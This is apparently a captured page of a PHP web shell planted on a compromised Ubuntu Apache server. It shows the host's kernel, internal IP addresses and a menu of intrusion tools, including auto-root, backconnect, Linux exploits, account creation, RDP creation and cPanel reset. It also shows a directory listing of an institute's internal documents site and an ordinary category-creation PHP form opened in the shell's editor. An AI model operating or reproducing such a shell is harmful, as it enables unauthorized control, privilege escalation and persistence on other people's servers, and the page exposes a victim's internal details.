Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
intranetpage /
iiitdinternaldocs /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-x--x
dist
[ DIR ]
drwxr-x--x
documents
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
plugins
[ DIR ]
drwxr-x--x
DBController.php
739
B
-rwxr-x--x
categorylist.php
2.25
KB
-rwxr-x--x
common.php
2.94
KB
-rwxr-x--x
createCategory.php
3.45
KB
-rwxr-x--x
createOfficeorder.php
9.13
KB
-rwxr-x--x
dashboard.php
3.01
KB
-rwxr-x--x
dbconfig.php
1.25
KB
-rwxr-x--x
get_subcatg.php
500
B
-rwxr-x--x
index.php
3.54
KB
-rwxr-x--x
indexDashboard.php
9.81
KB
-rwxr-x--x
list.php
9.5
KB
-rwxr-x--x
list.php_07032021
10.86
KB
-rwxr-x--x
logout.php
377
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createCategory.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; //require_once 'common.php'; $categoryDL = new IIITDELHI(); if(isset($_POST['createName'])) { $categoryName = trim($_POST['categoryName']); if(empty($categoryName)){ $errMSG = "Please Select Category Name."; } if(!isset($errMSG)) { $stmt = $categoryDL->runQuery("SELECT * FROM category WHERE categoryName=:categoryName1"); $stmt->execute(array(":categoryName1"=>$categoryName)); $rows = $stmt->fetch(PDO::FETCH_ASSOC); if($stmt->rowCount() > 0) { $errMSG = "This Category is Already Exist."; } else { if($categoryDL->categoryup($categoryName)) { $successMSG = "Category Created Successfuly..."; } else { $errMSG = "sorry , Query could no execute..."; } } } } ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Main content --> <section class="content"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="card card-primary card-outline mt-2"> <div class="card-header" style="padding-left: 20px;"> <h3 class="card-title"> Create Category </h3> </div> <div class="row"> <!-- left column --> <div class="col-md-6"> <!-- general form elements --> <div class="box box-primary" style="padding-left: 20px;"> <div class="box-body"> <?php if(isset($errMSG)){ ?> <div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4 style="font-size: 15px;"><i class="icon fa fa-ban"></i> Alert! <?php echo $errMSG; ?></h4> </div> <?php } else if(isset($successMSG)){ ?> <div class="alert alert-success alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> <h4 style="font-size: 15px;"><i class="icon fa fa-check"></i> Alert! <?php echo $successMSG; ?></h4> </div> <?php } ?> </div> <!-- form start --> <form role="form" name="category" action="createCategory.php" method="post"> <div class="box-body"> <div class="form-group"> <label for="createCategory">Category Name</label> <input type="text" class="form-control" id="createCategory" required name="categoryName" > </div> </div> <!-- /.box-body --> <div class="box-footer"> <button type="submit" class="btn btn-primary" name="createName">Create Category</button> </div> </form> </div> <!-- /.box --> </div> </div> </div> </div> </div> </div> </section> <!-- /.content --> <a id="back-to-top" href="#" class="btn btn-primary back-to-top" role="button" aria-label="Scroll to top"> <i class="fas fa-chevron-up"></i> </a> </div> <!-- /.content-wrapper --> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close